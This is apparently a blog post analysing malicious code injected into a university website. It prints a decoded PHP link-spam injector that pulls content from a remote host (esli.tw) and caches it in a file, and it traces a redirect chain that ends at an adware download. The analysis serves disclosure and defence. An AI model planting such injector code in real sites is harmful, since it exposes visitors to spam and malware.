Other way round to make sure whether it is service malicious pages or malware is: type "nagarjunauniversity" in google window and open the first link
Google description about the pages hosted by www.nagarjunauniversity.ac.in is
Real time view of malicious pages and AnalysisVisiting the site welcomes you with script execution, see diagram below
Viewing the source of this page will make you think for a while. Why Chinese and Russian links are present in the page?? Have a glimpse of the code.
Whe I reported the incident on OWASP, base64 encoded code was present on this page. Don't worry? The code is still present but on other pages. When I am writin this blog base64 encoded content was present at the following pages and many more
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
Source code of either of the pages looks like
If you observe carefully we can see a site which is partially encoded (percentage encoding)http%3A%2F%2Fbale.ws%2Fshow.php
Google's description had a mention about bale.ws domain.
When we open above site it gets redirected to
http://superpupermegacasino.com/which hosts *SmartDownload.exe*
Details of the EXE at Virustotal is shown as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/
Well, decoding the base64 content with base64_decode() method present within the malicious page gives the below script which is passed as an argument to eval(). eval executes the script
error_reporting(0);
$links = new GetLinks();
echo $links->Links;
class GetLinks
{
var $host = "esli.tw";
var $path = "/link.php?site=";
var $site = "";
var $user_agent = "";
var $Links = "";
var $_socket_timeout = 12;
var $_cashe_life_time = 3600;
var $_cashe_file = "cashe.txt";
function GetLinks()
{
if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {
$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
$this->user_agent = $_SERVER['HTTP_USER_AGENT'];
$this->Links = $this->fetch_remote_file();
if ($handle = fopen($this->_cashe_file, 'w')) {
fwrite($handle, $this->Links);
}
fclose($handle);
}
else {
$this->Links = file_get_contents($this->_cashe_file);
}
}
function fetch_remote_file()
{
$buff = '';
$fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
if (!$fp) {
} else {
$out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
$out .= "Host: {$this->host}\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$buff .= fgets($fp, 128);
}
fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
I am not sure what cashe.txt does and what are its contents!
The HTML Tag which is responsible for execution of scripts, malware etc is IFRAME.
Next blog will be most probably SmartDownload.exe binary analysis. Safe Surfing!!!
Brother first u must hav reported to that univers that server was hacked by chinese and then they injected iframe into that.... and called them to get it patched ... venky.cs@live.com
ReplyDeletei already informed them
ReplyDelete